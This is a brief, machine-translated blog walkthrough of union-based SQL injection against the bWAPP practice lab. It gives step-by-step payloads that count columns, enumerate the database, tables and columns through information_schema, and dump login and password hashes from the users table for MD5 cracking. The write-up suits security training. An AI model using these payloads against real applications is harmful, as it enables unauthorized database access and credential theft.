当前位置:网站首页>SQL Injection (GET/Search)
SQL Injection (GET/Search)
2022-07-03 13:37:00 【this is hhhhp】
1. Determine the injection point
Input ' Tips : near '%'' at line 1
1111' or 1=1 #No abnormality
2. Determine the number of fields
' order by 10 #
' order by 7 #7 A field
3. Determine the displayable fields :
-1' union select 1,2,3,4,5,6,7 # 2,3,4,5 Is a displayable field 
4. Blast storage :
-1' union select 1,database(),3,4,5,6,7 #Library name :bWAPP
5. Explosion meter :
-1' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#altogether 5 A watch , Obviously we need to use users
6. Pop field name
-1' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'#altogether 9 A field , We need to login,admin,password
7. Pop field content
-1' union select 1,login,password,4,admin,6,7 from bWAPP.users#Two in all
8.md5 Decrypt md5 Online decryption ,md5 Decryption encryption
A.I.M. bug
bee bug
边栏推荐
- Flink SQL knows why (7): haven't you even seen the ETL and group AGG scenarios that are most suitable for Flink SQL?
- 静态链表(数组的下标代替指针)
- The reasons why there are so many programming languages in programming internal skills
- 71 articles on Flink practice and principle analysis (necessary for interview)
- 106. 如何提高 SAP UI5 应用路由 url 的可读性
- Static linked list (subscript of array instead of pointer)
- SVN添加文件时的错误处理:…\conf\svnserve.conf:12: Option expected
- Flutter dynamic | fair 2.5.0 new version features
- The latest BSC can pay dividends. Any B usdt Shib eth dividend destruction marketing can
- TensorBoard可视化处理案例简析
猜你喜欢
双链笔记 RemNote 综合评测:快速输入、PDF 阅读、间隔重复/记忆
Flink SQL knows why (XV): changed the source code and realized a batch lookup join (with source code attached)
Detailed explanation of multithreading
![[redis] cache warm-up, cache avalanche and cache breakdown](/img/df/81f38087704de36946b470f68e8004.jpg)
[redis] cache warm-up, cache avalanche and cache breakdown
File uploading and email sending
【电脑插入U盘或者内存卡显示无法格式化FAT32如何解决】
PowerPoint 教程,如何在 PowerPoint 中將演示文稿另存為視頻?
Can newly graduated European college students get an offer from a major Internet company in the United States?
常见的几种最优化方法Matlab原理和深度分析
Flick SQL knows why (10): everyone uses accumulate window to calculate cumulative indicators
随机推荐
【556. 下一个更大元素 III】
Red hat satellite 6: better management of servers and clouds
刚毕业的欧洲大学生,就能拿到美国互联网大厂 Offer?
Stack application (balancer)
Unity embeddedbrowser browser plug-in event communication
logback日志的整理
使用Tensorflow进行完整的深度神经网络CNN训练完成图片识别案例2
Libuv库 - 设计概述(中文版)
道路建设问题
PowerPoint 教程,如何在 PowerPoint 中將演示文稿另存為視頻?
106. How to improve the readability of SAP ui5 application routing URL
Flink SQL knows why (13): is it difficult to join streams? (next)
Father and basketball
Flink SQL knows why (XI): weight removal is not only count distinct, but also powerful duplication
Complete deep neural network CNN training with tensorflow to complete picture recognition case 2
Kivy tutorial how to automatically load kV files
双向链表(我们只需要关注插入和删除函数)
Flutter动态化 | Fair 2.5.0 新版本特性
Realize the recognition and training of CNN images, and process the cifar10 data set and other methods through the tensorflow framework
Typeerror resolved: argument 'parser' has incorrect type (expected lxml.etree.\u baseparser, got type)